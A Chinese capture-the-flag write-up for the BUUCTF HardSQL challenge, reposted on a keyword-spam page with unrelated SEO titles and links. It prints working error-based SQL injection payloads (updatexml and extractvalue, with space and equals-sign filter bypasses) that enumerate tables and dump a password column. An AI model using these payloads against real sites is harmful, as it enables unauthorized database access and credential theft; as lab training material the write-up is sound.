当前位置: 首页 > news >正文

哪些网站做代理中国搜索引擎排名2021

news 2025/7/16 19:19:39
哪些网站做代理,中国搜索引擎排名2021,高端品牌名字大全,软件系统开发在哪儿题目 打开页面显示为 查看源代码没有发现其他的提示信息,随便尝试一下 错误 题目名为hardsql,先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有…

题目

打开页面显示为

查看源代码没有发现其他的提示信息,随便尝试一下

错误

题目名为hardsql,先来尝试有无sql注入存在

尝试输入单引号输入

显示页面存在注入

这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示

上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤

使用updatexml

通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出

先查询数据库,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

可得知数据库名为geek

查询表,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

得到表

查字段,构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123

可以得到字段名

然后查询想要的字段

构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123

发现flag显示不全,函数显示有字符数限制

使用right可得到另一半

构造payload

http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123

使用extractvalue()

这里空格和=没有,使用()代替空格,使用like代替=

查数据库

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23

查表

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

查字段

构造payload

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

查数据

/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

这里也是显示不全,按照上面的updatexml后的方法进行补全即可

参考文章链接:

buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客

https://www.cnblogs.com/GTL-JU/p/16042242.html

https://www.cnblogs.com/upfine/p/16578800.html

http://www.hengruixuexiao.com/news/50545.html

相关文章:

  • .net网站开发技术简介属于免费的网络营销方式
  • 做界面网站用什么语言好企业seo网站营销推广
  • 江门网站制作维护java培训机构十强
  • 做网络营销如何建立自己的网站长沙疫情最新数据消息
  • 怎么用PS做网站横幅交换链接营销案例
  • 小米路由器建设网站网络营销就业方向和前景
  • 策划公司网站建设淘宝优秀软文范例100字
  • 建设银行打印回单网站制作网站要找什么公司
  • 国外做饮料视频网站建立公司网站需要多少钱
  • 做301跳转会影响之前网站排名吗美国搜索引擎浏览器
  • 网站开发工程师面试题互联网营销做什么
  • 做企业英语网站要注意哪些seo培训优化
  • 房山做网站公司seo网站优化价格
  • 上市公司网站建设网站优化团队
  • 容桂网站制作代理官方百度
  • 电子商务网站设计目的及要求百度首页 百度
  • 常用的搜索引擎的网站海外广告联盟平台推广
  • 微信企业网站 源码洛阳seo网络推广
  • 学校网站模板html武汉seo优化代理
  • 视频号直播怎么引流安徽网站seo公司
  • 上海网站seo诊断互联网营销师培训班
  • 产品设计接单平台优化网站排名需要多少钱
  • h5 响应式手机网站nba最新排名东西部
  • 全国网站制作公司排名百度热点排行榜
  • app定制小程序开发宁波关键词优化时间
  • 沙坪坝网站建设公司选哪家好百度地图推广电话
  • 温州营销推广公司浙江seo博客
  • wordpress随意布局宁波seo软件免费课程
  • vs2008网站消息弹窗怎么做搜索引擎优化公司排行
  • wordpress是什么来的合肥网站优化推广方案